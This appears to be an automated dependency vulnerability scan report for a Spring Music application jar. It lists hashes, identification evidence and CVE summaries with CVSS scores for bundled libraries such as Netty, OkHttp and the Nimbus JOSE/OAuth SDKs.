MD5: 017ed4a56b4cefe2662b6e6ee98f5d81
SHA1: 19adaf9ad6833da7506cdccc7c6d16952f366fa5
SHA256: 8b3566b9ec64349ed05c3ff38de4647fd25f5a91ebf71f9a71d2dc804cb0ce1f
pkg:maven/io.netty/netty-resolver@4.1.23.Final
CVE-2019-20444
HttpObjectDecoder.java in Netty before 4.1.44 allows an HTTP header that lacks a colon, which might be interpreted as a separate header with an incorrect syntax, or might be interpreted as an "invalid fold." CWE-444 Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling')
CVSSv3:
Base Score: CRITICAL (9.1)
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N/E:3.9/RC:R/MAV:A
CVSSv2:
Base Score: MEDIUM (6.4)
Vector: /AV:N/AC:L/Au:N/C:P/I:P/A:N
Vulnerable Software & Versions:
CVE-2019-20445
HttpObjectDecoder.java in Netty before 4.1.44 allows a Content-Length header to be accompanied by a second Content-Length header, or by a Transfer-Encoding header. CWE-444 Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling')
CVSSv3:
Base Score: CRITICAL (9.1)
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N/E:3.9/RC:R/MAV:A
CVSSv2:
Base Score: MEDIUM (6.4)
Vector: /AV:N/AC:L/Au:N/C:P/I:P/A:N
Vulnerable Software & Versions:
CVE-2019-16869
Netty before 4.1.42.Final mishandles whitespace before the colon in HTTP headers (such as a "Transfer-Encoding : chunked" line), which leads to HTTP request smuggling. CWE-444 Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling')
CVSSv3:
Base Score: HIGH (7.5)
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N/E:3.9/RC:R/MAV:A
CVSSv2:
Base Score: MEDIUM (5.0)
Vector: /AV:N/AC:L/Au:N/C:N/I:P/A:N
Vulnerable Software & Versions:
CVE-2020-11612
The ZlibDecoders in Netty 4.1.x before 4.1.46 allow for unbounded memory allocation while decoding a ZlibEncoded byte stream. An attacker could send a large ZlibEncoded byte stream to the Netty server, forcing the server to allocate all of its free memory to a single decoder. CWE-770 Allocation of Resources Without Limits or Throttling
CVSSv3:
Base Score: HIGH (7.5)
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:3.9/RC:R/MAV:A
CVSSv2:
Base Score: MEDIUM (5.0)
Vector: /AV:N/AC:L/Au:N/C:N/I:N/A:P
References:
OSSINDEX - [CVE-2020-11612] CWE-789: Uncontrolled Memory Allocation
OSSIndex - https://github.com/netty/netty/issues/9924
Vulnerable Software & Versions:
CVE-2021-37136
The Bzip2 decompression decoder function doesn't allow setting size restrictions on the decompressed output data (which affects the allocation size used during decompression). All users of Bzip2Decoder are affected. The malicious input can trigger an OOME and so a DoS attack. CWE-400 Uncontrolled Resource Consumption
CVSSv3:
Base Score: HIGH (7.5)
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:3.9/RC:R/MAV:A
CVSSv2:
Base Score: MEDIUM (5.0)
Vector: /AV:N/AC:L/Au:N/C:N/I:N/A:P
Vulnerable Software & Versions:
CVE-2021-37137
The Snappy frame decoder function doesn't restrict the chunk length, which may lead to excessive memory usage. Besides this, it also may buffer reserved skippable chunks until the whole chunk has been received, which may lead to excessive memory usage as well. This vulnerability can be triggered by supplying malicious input that decompresses to a very big size (via a network stream or a file) or by sending a huge skippable chunk. CWE-400 Uncontrolled Resource Consumption
CVSSv3:
Base Score: HIGH (7.5)
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:3.9/RC:R/MAV:A
CVSSv2:
Base Score: MEDIUM (5.0)
Vector: /AV:N/AC:L/Au:N/C:N/I:N/A:P
Vulnerable Software & Versions:
CVE-2022-41881
Netty project is an event-driven asynchronous network application framework. In versions prior to 4.1.86.Final, a StackOverflowError can be raised when parsing a malformed crafted message due to an infinite recursion. This issue is patched in version 4.1.86.Final. There is no workaround, except using a custom HaProxyMessageDecoder. CWE-674 Uncontrolled Recursion
CVSSv3:
Base Score: HIGH (7.5)
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:3.9/RC:R/MAV:A
Vulnerable Software & Versions:
CVE-2023-44487
CISA Known Exploited Vulnerability:
Product: IETF HTTP/2
Name: HTTP/2 Rapid Reset Attack Vulnerability
Date Added: 2023-10-10
Description: HTTP/2 contains a rapid reset vulnerability that allows for a distributed denial-of-service attack (DDoS).
Required Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
Due Date: 2023-10-31
Notes: This vulnerability affects a common open-source component, third-party library, or protocol used by different products. For more information, please see: HTTP/2 Rapid Reset Vulnerability, CVE-2023-44487 | CISA: https://www.cisa.gov/news-events/alerts/2023/10/10/http2-rapid-reset-vulnerability-cve-2023-44487; https://blog.cloudflare.com/technical-breakdown-http2-rapid-reset-ddos-attack/; https://nvd.nist.gov/vuln/detail/CVE-2023-44487
The HTTP/2 protocol allows a denial of service (server resource consumption) because request cancellation can reset many streams quickly, as exploited in the wild in August through October 2023. CWE-400 Uncontrolled Resource Consumption, NVD-CWE-noinfo
CVSSv3:
Base Score: HIGH (7.5)
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:3.9/RC:R/MAV:A
ISSUE_TRACKING,THIRD_PARTY_ADVISORY cve@mitre.org - ISSUE_TRACKING,VENDOR_ADVISORY cve@mitre.org - ISSUE_TRACKING,VENDOR_ADVISORY cve@mitre.org - ISSUE_TRACKING,VENDOR_ADVISORY cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST cve@mitre.org - MAILING_LIST,PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,PATCH,VENDOR_ADVISORY cve@mitre.org - MAILING_LIST,RELEASE_NOTES,VENDOR_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,VENDOR_ADVISORY cve@mitre.org - MAILING_LIST,VENDOR_ADVISORY cve@mitre.org - 
MITIGATION,PATCH,VENDOR_ADVISORY cve@mitre.org - MITIGATION,PATCH,VENDOR_ADVISORY cve@mitre.org - MITIGATION,VENDOR_ADVISORY cve@mitre.org - PATCH cve@mitre.org - PATCH cve@mitre.org - PATCH cve@mitre.org - PATCH,VENDOR_ADVISORY cve@mitre.org - PATCH,VENDOR_ADVISORY cve@mitre.org - PRESS/MEDIA_COVERAGE cve@mitre.org - PRESS/MEDIA_COVERAGE,THIRD_PARTY_ADVISORY cve@mitre.org - PRESS/MEDIA_COVERAGE,THIRD_PARTY_ADVISORY cve@mitre.org - PRESS/MEDIA_COVERAGE,THIRD_PARTY_ADVISORY cve@mitre.org - PRESS/MEDIA_COVERAGE,THIRD_PARTY_ADVISORY cve@mitre.org - PRODUCT cve@mitre.org - PRODUCT cve@mitre.org - PRODUCT,RELEASE_NOTES cve@mitre.org - PRODUCT,THIRD_PARTY_ADVISORY cve@mitre.org - RELEASE_NOTES cve@mitre.org - RELEASE_NOTES cve@mitre.org - RELEASE_NOTES,THIRD_PARTY_ADVISORY cve@mitre.org - RELEASE_NOTES,VENDOR_ADVISORY cve@mitre.org - TECHNICAL_DESCRIPTION,VENDOR_ADVISORY cve@mitre.org - TECHNICAL_DESCRIPTION,VENDOR_ADVISORY cve@mitre.org - TECHNICAL_DESCRIPTION,VENDOR_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY,US_GOVERNMENT_RESOURCE cve@mitre.org - THIRD_PARTY_ADVISORY,VENDOR_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY,VENDOR_ADVISORY cve@mitre.org - VENDOR_ADVISORY cve@mitre.org - VENDOR_ADVISORY cve@mitre.org - VENDOR_ADVISORY cve@mitre.org - VENDOR_ADVISORY cve@mitre.org - VENDOR_ADVISORY cve@mitre.org - VENDOR_ADVISORY cve@mitre.org - VENDOR_ADVISORY cve@mitre.org - VENDOR_ADVISORY cve@mitre.org - VENDOR_ADVISORY cve@mitre.org - VENDOR_ADVISORY cve@mitre.org - VENDOR_ADVISORY cve@mitre.org - VENDOR_ADVISORY cve@mitre.org - 
VENDOR_ADVISORY cve@mitre.org - VENDOR_ADVISORY cve@mitre.org - VENDOR_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2021-43797
Netty is an asynchronous event-driven network application framework for rapid development of maintainable high performance protocol servers & clients. Netty prior to version 4.1.71.Final skips control chars when they are present at the beginning / end of the header name. It should instead fail fast as these are not allowed by the spec and could lead to HTTP request smuggling. Failing to do the validation might cause netty to "sanitize" header names before it forwards these to another remote system when used as a proxy. This remote system can't see the invalid usage anymore, and therefore does not do the validation itself. Users should upgrade to version 4.1.71.Final.
CWE-444 Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling')
CVSSv3:
Base Score: MEDIUM (6.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N/E:2.8/RC:R/MAV:A
CVSSv2:
Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:N/I:P/A:N
References:
Vulnerable Software & Versions:
CVE-2023-34462
Netty is an asynchronous event-driven network application framework for rapid development of maintainable high performance protocol servers & clients. The `SniHandler` can allocate up to 16MB of heap for each channel during the TLS handshake. When the handler or the channel does not have an idle timeout, it can be used to make a TCP server using the `SniHandler` allocate 16MB of heap. The `SniHandler` class is a handler that waits for the TLS handshake to configure a `SslHandler` according to the server name indicated by the `ClientHello` record. For this purpose it allocates a `ByteBuf` using the value defined in the `ClientHello` record. Normally the value of the packet should be smaller than the handshake packet, but there are no checks done here and, the way the code is written, it is possible to craft a packet that makes the `SslClientHelloHandler`. This vulnerability has been fixed in version 4.1.94.Final.
CWE-400 Uncontrolled Resource Consumption, CWE-770 Allocation of Resources Without Limits or Throttling
CVSSv3:
Base Score: MEDIUM (6.5) Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H/E:2.8/RC:R/MAV:A
References:
Vulnerable Software & Versions:
CVE-2021-21295
Netty is an open-source, asynchronous event-driven network application framework for rapid development of maintainable high performance protocol servers & clients. In Netty (io.netty:netty-codec-http2) before version 4.1.60.Final there is a vulnerability that enables request smuggling. If a Content-Length header is present in the original HTTP/2 request, the field is not validated by `Http2MultiplexHandler` as it is propagated up. This is fine as long as the request is not proxied through as HTTP/1.1. If the request comes in as an HTTP/2 stream, gets converted into the HTTP/1.1 domain objects (`HttpRequest`, `HttpContent`, etc.) via `Http2StreamFrameToHttpObjectCodec` and then sent up to the child channel's pipeline and proxied through a remote peer as HTTP/1.1, this may result in request smuggling. In a proxy case, users may assume the content-length is validated somehow, which is not the case. If the request is forwarded to a backend channel that is an HTTP/1.1 connection, the Content-Length now has meaning and needs to be checked. An attacker can smuggle requests inside the body as it gets downgraded from HTTP/2 to HTTP/1.1. For an example attack refer to the linked GitHub Advisory. Users are only affected if all of this is true: `HTTP2MultiplexCodec` or `Http2FrameCodec` is used, `Http2StreamFrameToHttpObjectCodec` is used to convert to HTTP/1.1 objects, and these HTTP/1.1 objects are forwarded to another remote peer. This has been patched in 4.1.60.Final. As a workaround, the user can do the validation themselves by implementing a custom `ChannelInboundHandler` that is put in the `ChannelPipeline` behind `Http2StreamFrameToHttpObjectCodec`.
CWE-444 Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling')
CVSSv3:
Base Score: MEDIUM (5.9) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N/E:2.2/RC:R/MAV:A
CVSSv2:
Base Score: LOW (2.6) Vector: /AV:N/AC:H/Au:N/C:N/I:P/A:N
References:
Vulnerable Software & Versions:
CVE-2021-21409
Netty is an open-source, asynchronous event-driven network application framework for rapid development of maintainable high performance protocol servers & clients. In Netty (io.netty:netty-codec-http2) before version 4.1.61.Final there is a vulnerability that enables request smuggling. The content-length header is not correctly validated if the request only uses a single Http2HeaderFrame with endStream set to true. This could lead to request smuggling if the request is proxied to a remote peer and translated to HTTP/1.1. This is a follow-up of GHSA-wm47-8v5p-wjpj/CVE-2021-21295, whose fix missed this one case. This was fixed as part of 4.1.61.Final.
CWE-444 Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling')
CVSSv3:
Base Score: MEDIUM (5.9) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N/E:2.2/RC:R/MAV:A
CVSSv2:
Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:N/I:P/A:N
References:
Vulnerable Software & Versions:
CVE-2021-21290
Netty is an open-source, asynchronous event-driven network application framework for rapid development of maintainable high performance protocol servers & clients. In Netty before version 4.1.59.Final there is a vulnerability on Unix-like systems involving an insecure temp file. When netty's multipart decoders are used, local information disclosure can occur via the local system temporary directory if temporarily storing uploads on the disk is enabled. On unix-like systems, the temporary directory is shared between all users. As such, writing to this directory using APIs that do not explicitly set the file/directory permissions can lead to information disclosure. Of note, this does not impact modern MacOS Operating Systems. The method "File.createTempFile" on unix-like systems creates a random file, but, by default, will create this file with the permissions "-rw-r--r--". Thus, if sensitive information is written to this file, other local users can read this information. This is the case in netty's "AbstractDiskHttpData", which is vulnerable. This has been fixed in version 4.1.59.Final. As a workaround, one may specify one's own "java.io.tmpdir" when starting the JVM or use "DefaultHttpDataFactory.setBaseDir(...)" to set the directory to something that is only readable by the current user.
CWE-378 Creation of Temporary File With Insecure Permissions, CWE-379 Creation of Temporary File in Directory with Insecure Permissions, CWE-668 Exposure of Resource to Wrong Sphere
CVSSv3:
Base Score: MEDIUM (5.5) Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N/E:1.8/RC:R/MAV:A
CVSSv2:
Base Score: LOW (1.9) Vector: /AV:L/AC:M/Au:N/C:P/I:N/A:N
References:
OSSINDEX - [CVE-2021-21290] CWE-378: Creation of Temporary File With Insecure Permissions
OSSIndex - http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-21290
OSSIndex - https://github.com/netty/netty/security/advisories/GHSA-5mcr-gq6c-3hq2
Vulnerable Software & Versions:
CVE-2022-24823
Netty is an open-source, asynchronous event-driven network application framework. The package `io.netty:netty-codec-http` prior to version 4.1.77.Final contains an insufficient fix for CVE-2021-21290. When Netty's multipart decoders are used, local information disclosure can occur via the local system temporary directory if temporarily storing uploads on the disk is enabled. This only impacts applications running on Java version 6 and lower. Additionally, this vulnerability impacts code running on Unix-like systems, and very old versions of Mac OSX and Windows, as they all share the system temporary directory between all users. Version 4.1.77.Final contains a patch for this vulnerability. As a workaround, specify one's own `java.io.tmpdir` when starting the JVM or use DefaultHttpDataFactory.setBaseDir(...) to set the directory to something that is only readable by the current user.
CWE-378 Creation of Temporary File With Insecure Permissions, CWE-379 Creation of Temporary File in Directory with Insecure Permissions, CWE-668 Exposure of Resource to Wrong Sphere
CVSSv3:
Base Score: MEDIUM (5.5) Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N/E:1.8/RC:R/MAV:A
CVSSv2:
Base Score: LOW (1.9) Vector: /AV:L/AC:M/Au:N/C:P/I:N/A:N
References:
Vulnerable Software & Versions:
CVE-2025-25193
Netty, an asynchronous, event-driven network application framework, has a vulnerability in versions up to and including 4.1.118.Final. An unsafe reading of an environment file could potentially cause a denial of service in Netty. When loaded in a Windows application, Netty attempts to load a file that does not exist. If an attacker creates such a file and it is large, the Netty application crashes. A similar issue was previously reported as CVE-2024-47535. This issue was fixed, but the fix was incomplete in that null-bytes were not counted against the input limit. Commit d1fbda62d3a47835d3fb35db8bd42ecc205a5386 contains an updated fix.
CWE-400 Uncontrolled Resource Consumption
CVSSv3:
Base Score: MEDIUM (5.5) Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H/E:1.8/RC:R/MAV:A
References:
Vulnerable Software & Versions:
spring-music-sqldb-1.0.jar: nimbus-jose-jwt-10.3.1.jar (shaded: com.google.code.gson:gson:2.12.1)
License:
Apache-2.0: https://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/nimbus-jose-jwt-10.3.1.jar/META-INF/maven/com.google.code.gson/gson/pom.xml
MD5: 54205b633e8a676f5bb25c188631c854
SHA1: d2c3993ff96e5da39a57e5e0b695eda560949b57
SHA256: 0b5735ec85f45282f1e2c769779800427b150a8163f405093a9280b71cab1978
Evidence Type | Source | Name | Value | Confidence
Vendor | pom | artifactid | gson | Low
Vendor | pom | groupid | com.google.code.gson | Highest
Vendor | pom | name | Gson | High
Vendor | pom | parent-artifactid | gson-parent | Low
Product | pom | artifactid | gson | Highest
Product | pom | groupid | com.google.code.gson | Highest
Product | pom | name | Gson | High
Product | pom | parent-artifactid | gson-parent | Medium
Version | pom | version | 2.12.1 | Highest
spring-music-sqldb-1.0.jar: nimbus-jose-jwt-10.3.1.jar
Description:
Java library for Javascript Object Signing and Encryption (JOSE) and JSON Web Tokens (JWT)
License:
The Apache Software License, Version 2.0: https://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/nimbus-jose-jwt-10.3.1.jar
MD5: 735446acf5f7d08dc41c2815f27e0266
SHA1: 4ec9e53a1bb37626adfec4302e20c13d4e56c5bc
SHA256: d7919520ae9702ea06a23cc669c9ed1daa543d12a33a1be214a85b47dfc1c7c8
Evidence Type | Source | Name | Value | Confidence
Vendor | file | name | nimbus-jose-jwt | High
Vendor | jar | package name | jose | Highest
Vendor | jar | package name | jwt | Highest
Vendor | jar | package name | nimbusds | Highest
Vendor | Manifest | build-date | ${timestamp} | Low
Vendor | Manifest | build-jdk-spec | 17 | Low
Vendor | Manifest | build-number | ${buildNumber} | Low
Vendor | Manifest | build-tag | 10.3.1 | Low
Vendor | Manifest | bundle-docurl | https://connect2id.com | Low
Vendor | Manifest | bundle-symbolicname | com.nimbusds.nimbus-jose-jwt | Medium
Vendor | Manifest | Implementation-Vendor | Connect2id Ltd. | High
Vendor | Manifest | multi-release | true | Low
Vendor | Manifest | specification-vendor | Connect2id Ltd. | Low
Vendor | pom | artifactid | nimbus-jose-jwt | Low
Vendor | pom | developer email | vladimir@dzhuvinov.com | Low
Vendor | pom | developer id | vdzhuvinov | Medium
Vendor | pom | developer name | Vladimir Dzhuvinov | Medium
Vendor | pom | groupid | com.nimbusds | Highest
Vendor | pom | name | Nimbus JOSE+JWT | High
Vendor | pom | organization name | Connect2id Ltd. | High
Vendor | pom | organization url | https://connect2id.com | Medium
Vendor | pom | url | https://bitbucket.org/connect2id/nimbus-jose-jwt | Highest
Product | file | name | nimbus-jose-jwt | High
Product | jar | package name | jose | Highest
Product | jar | package name | jwt | Highest
Product | jar | package name | nimbusds | Highest
Product | Manifest | build-date | ${timestamp} | Low
Product | Manifest | build-jdk-spec | 17 | Low
Product | Manifest | build-number | ${buildNumber} | Low
Product | Manifest | build-tag | 10.3.1 | Low
Product | Manifest | bundle-docurl | https://connect2id.com | Low
Product | Manifest | Bundle-Name | Nimbus JOSE+JWT | Medium
Product | Manifest | bundle-symbolicname | com.nimbusds.nimbus-jose-jwt | Medium
Product | Manifest | Implementation-Title | Nimbus JOSE+JWT | High
Product | Manifest | multi-release | true | Low
Product | Manifest | specification-title | Nimbus JOSE+JWT | Medium
Product | pom | artifactid | nimbus-jose-jwt | Highest
Product | pom | developer email | vladimir@dzhuvinov.com | Low
Product | pom | developer id | vdzhuvinov | Low
Product | pom | developer name | Vladimir Dzhuvinov | Low
Product | pom | groupid | com.nimbusds | Highest
Product | pom | name | Nimbus JOSE+JWT | High
Product | pom | organization name | Connect2id Ltd. | Low
Product | pom | organization url | https://connect2id.com | Low
Product | pom | url | https://bitbucket.org/connect2id/nimbus-jose-jwt | Medium
Version | file | version | 10.3.1 | High
Version | Manifest | build-tag | 10.3.1 | Low
Version | Manifest | Bundle-Version | 10.3.1 | High
Version | Manifest | Implementation-Version | 10.3.1 | High
Version | pom | version | 10.3.1 | Highest
spring-music-sqldb-1.0.jar: oauth2-oidc-sdk-5.24.1.jar
Description:
OAuth 2.0 SDK with OpenID Connection extensions for developing client and server applications.
License:
Apache License, version 2.0: http://www.apache.org/licenses/LICENSE-2.0.html
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/oauth2-oidc-sdk-5.24.1.jar
MD5: 1604afda5f300ebf1a039e99d8047e1c
SHA1: 33d72b291c44dc4b56d94e3456873edc7b3ce0d4
SHA256: 0441230ddb3ad1182554e2cd1f7233a776fcd51524e7bce1439607ce92714c8e
Evidence Type | Source | Name | Value | Confidence
Vendor | file | name | oauth2-oidc-sdk | High
Vendor | jar | package name | client | Highest
Vendor | jar | package name | connect | Highest
Vendor | jar | package name | nimbusds | Highest
Vendor | jar | package name | oauth2 | Highest
Vendor | jar | package name | openid | Highest
Vendor | jar | package name | sdk | Highest
Vendor | Manifest | build-date | ${timestamp} | Low
Vendor | Manifest | build-number | ${buildNumber} | Low
Vendor | Manifest | build-tag | 5.24.1 | Low
Vendor | Manifest | bundle-docurl | http://connect2id.com | Low
Vendor | Manifest | bundle-symbolicname | oauth2-oidc-sdk | Medium
Vendor | Manifest | implementation-url | https://bitbucket.org/connect2id/oauth-2.0-sdk-with-openid-connect-extensions | Low
Vendor | Manifest | Implementation-Vendor | Connect2id Ltd. | High
Vendor | Manifest | Implementation-Vendor-Id | com.nimbusds | Medium
Vendor | Manifest | specification-vendor | Connect2id Ltd. | Low
Vendor | pom | artifactid | oauth2-oidc-sdk | Low
Vendor | pom | developer email | vladimir@dzhuvinov.com | Low
Vendor | pom | developer id | vdzhuvinov | Medium
Vendor | pom | developer name | Vladimir Dzhuvinov | Medium
Vendor | pom | groupid | com.nimbusds | Highest
Vendor | pom | name | OAuth 2.0 SDK with OpenID Connect extensions | High
Vendor | pom | organization name | Connect2id Ltd. | High
Vendor | pom | organization url | http://connect2id.com | Medium
Vendor | pom | url | https://bitbucket.org/connect2id/oauth-2.0-sdk-with-openid-connect-extensions | Highest
Product | file | name | oauth2-oidc-sdk | High
Product | jar | package name | client | Highest
Product | jar | package name | connect | Highest
Product | jar | package name | http | Highest
Product | jar | package name | nimbusds | Highest
Product | jar | package name | oauth2 | Highest
Product | jar | package name | openid | Highest
Product | jar | package name | sdk | Highest
Product | Manifest | build-date | ${timestamp} | Low
Product | Manifest | build-number | ${buildNumber} | Low
Product | Manifest | build-tag | 5.24.1 | Low
Product | Manifest | bundle-docurl | http://connect2id.com | Low
Product | Manifest | Bundle-Name | OAuth 2.0 SDK with OpenID Connect extensions | Medium
Product | Manifest | bundle-symbolicname | oauth2-oidc-sdk | Medium
Product | Manifest | Implementation-Title | OAuth 2.0 SDK with OpenID Connect extensions | High
Product | Manifest | implementation-url | https://bitbucket.org/connect2id/oauth-2.0-sdk-with-openid-connect-extensions | Low
Product | Manifest | specification-title | OAuth 2.0 SDK with OpenID Connect extensions | Medium
Product | pom | artifactid | oauth2-oidc-sdk | Highest
Product | pom | developer email | vladimir@dzhuvinov.com | Low
Product | pom | developer id | vdzhuvinov | Low
Product | pom | developer name | Vladimir Dzhuvinov | Low
Product | pom | groupid | com.nimbusds | Highest
Product | pom | name | OAuth 2.0 SDK with OpenID Connect extensions | High
Product | pom | organization name | Connect2id Ltd. | Low
Product | pom | organization url | http://connect2id.com | Low
Product | pom | url | https://bitbucket.org/connect2id/oauth-2.0-sdk-with-openid-connect-extensions | Medium
Version | file | version | 5.24.1 | High
Version | Manifest | build-tag | 5.24.1 | Low
Version | Manifest | Bundle-Version | 5.24.1 | High
Version | Manifest | Implementation-Version | 5.24.1 | High
Version | pom | version | 5.24.1 | Highest
spring-music-sqldb-1.0.jar: okhttp-3.3.1.jar
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/okhttp-3.3.1.jar
MD5: 50504ee05596f03f72ffc7b1c901954d
SHA1: 19047bdb6a4fc00a44124f64ca98e88fc204e7e3
SHA256: a47f4efa166551cd5acc04f1071d82dafbf05638c21f9ca13068bc6633e3bff6
Evidence Type | Source | Name | Value | Confidence
Vendor | file | name | okhttp | High
Vendor | jar | package name | internal | Low
Vendor | jar | package name | okhttp3 | Highest
Vendor | jar | package name | okhttp3 | Low
Vendor | pom | artifactid | okhttp | Low
Vendor | pom | groupid | com.squareup.okhttp3 | Highest
Vendor | pom | name | OkHttp | High
Vendor | pom | parent-artifactid | parent | Low
Product | file | name | okhttp | High
Product | jar | package name | internal | Low
Product | jar | package name | okhttp3 | Highest
Product | pom | artifactid | okhttp | Highest
Product | pom | groupid | com.squareup.okhttp3 | Highest
Product | pom | name | OkHttp | High
Product | pom | parent-artifactid | parent | Medium
Version | file | version | 3.3.1 | High
Version | pom | version | 3.3.1 | Highest
CVE-2021-0341 (OSSINDEX)
In verifyHostName of OkHostnameVerifier.java, there is a possible way to accept a certificate for the wrong domain due to improperly used crypto. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.
Product: Android
Versions: Android-8.1 Android-9 Android-10 Android-11
Android ID: A-171980069
Sonatype's research suggests that this CVE's details differ from those defined at NVD. See https://ossindex.sonatype.org/vulnerability/CVE-2021-0341 for details.
CWE-295 Improper Certificate Validation
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
References:
Vulnerable Software & Versions (OSSINDEX):
cpe:2.3:a:com.squareup.okhttp3:okhttp:3.3.1:*:*:*:*:*:*:*
CVE-2018-20200
CertificatePinner.java in OkHttp 3.x through 3.12.0 allows man-in-the-middle attackers to bypass certificate pinning by changing SSLContext and the boolean values while hooking the application. NOTE: This id is disputed because some parties don't consider this a vulnerability. Their rationale can be found in https://github.com/square/okhttp/issues/4967
CWE-295 Improper Certificate Validation
CVSSv3:
Base Score: MEDIUM (5.9) Vector: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N/E:2.2/RC:R/MAV:A
CVSSv2:
Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:P/I:N/A:N
References:
Vulnerable Software & Versions:
CVE-2023-0833
A flaw was found in Red Hat's AMQ-Streams, which ships a version of the OKHttp component with an information disclosure flaw via an exception triggered by a header containing an illegal value. This issue could allow an authenticated attacker to access information outside of their regular permissions.
CWE-209 Generation of Error Message Containing Sensitive Information
CVSSv3:
Base Score: MEDIUM (5.5) Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N/E:1.8/RC:R/MAV:A
References:
Vulnerable Software & Versions:
spring-music-sqldb-1.0.jar: okhttp-urlconnection-3.3.1.jar
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/okhttp-urlconnection-3.3.1.jar
MD5: dae63d9ddbe30a1ced59e48a524028ac
SHA1: 14e70f2069fb98dc60346dd24cb7b6a2e321580d
